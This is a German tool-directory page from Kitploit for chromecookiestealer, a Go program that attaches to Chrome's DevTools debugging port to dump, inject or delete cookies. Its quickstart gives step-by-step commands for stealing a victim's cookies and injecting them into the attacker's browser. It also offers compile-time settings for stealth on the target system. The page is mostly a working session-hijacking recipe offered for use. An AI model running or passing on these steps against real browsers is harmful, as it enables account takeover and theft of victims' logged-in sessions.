Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
chromecookiestealer — Stehlen/Einschleusen von Chrome-Cookies über das DevTools-Protokoll (--remote-debugging-port). | Kitploit
Tools/GitHubGitHub/magisterquis/chromecookiestealer
DatenexfiltrationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmagisterquis/chromecookiestealer

chromecookiestealer

Stehlen/Einschleusen von Chrome-Cookies über das DevTools-Protokoll (--remote-debugging-port).

Repository anzeigen
11514vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Chrome Cookie Stealer (und Injektor)

Hängt sich mit Remote DevTools-Protokoll an Chrome an und stiehlt/injiziert/löscht/entfernt Cookies.

Stark inspiriert von WhiteChocolateMacademiaNut.

Cookies werden als JSON-Objekte mit Chromes eigenem Format ausgegeben. Das gleiche Format wird für zu ladende Cookies verwendet.

Nur zur legalen Nutzung.

Funktionen

  • Chrome-Cookies ausgeben
  • Ausgegebene Cookies in eine (andere Instanz von) Chrome injizieren
  • Chrome-Cookies löschen
  • Standardwerte zur Kompilierzeit einstellbar

Schnellstart

Stehlen Sie die Cookies eines Opfers:

root@kitploit:~
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

In den lokalen Browser des Angreifers injizieren:

root@kitploit:~
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json

Verwendung

root@kitploit:~
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

Erstellen

go build sollte alles sein, was nötig ist. Die folgenden Optionen können zur Kompilierzeit mit -ldflags '-X main.Foo=bar' gesetzt werden, für etwas mehr Tarnung auf dem Zielsystem.

Keine der oben genannten sind standardmäßig gesetzt.

Das Chrome DevTools-Protokoll ist ein sich bewegendes Ziel. Es kann notwendig sein, eine neuere Version der chromedp- und cdproto-Bibliotheken zu verwenden, falls dieses Programm nicht mehr funktioniert. Dies kann mit

root@kitploit:~
go get -u -v all
go mod tidy
go build

erledigt werden, was durchaus den Nebeneffekt haben könnte, alles andere zu zerstören.

¯\_(ツ)_/¯

Tool herunterladen
VariableBeschreibung
DumpFileName einer Datei, in die Cookies ausgegeben werden sollen. Impliziert -dump
InjectFileName einer Datei, aus der Cookies injiziert werden sollen. Impliziert -inject
DeleteFileName einer Datei mit Parametern, die zu löschende Cookies beschreiben. Impliziert -delete
DoClearWenn auf einen beliebigen Wert gesetzt, impliziert -clear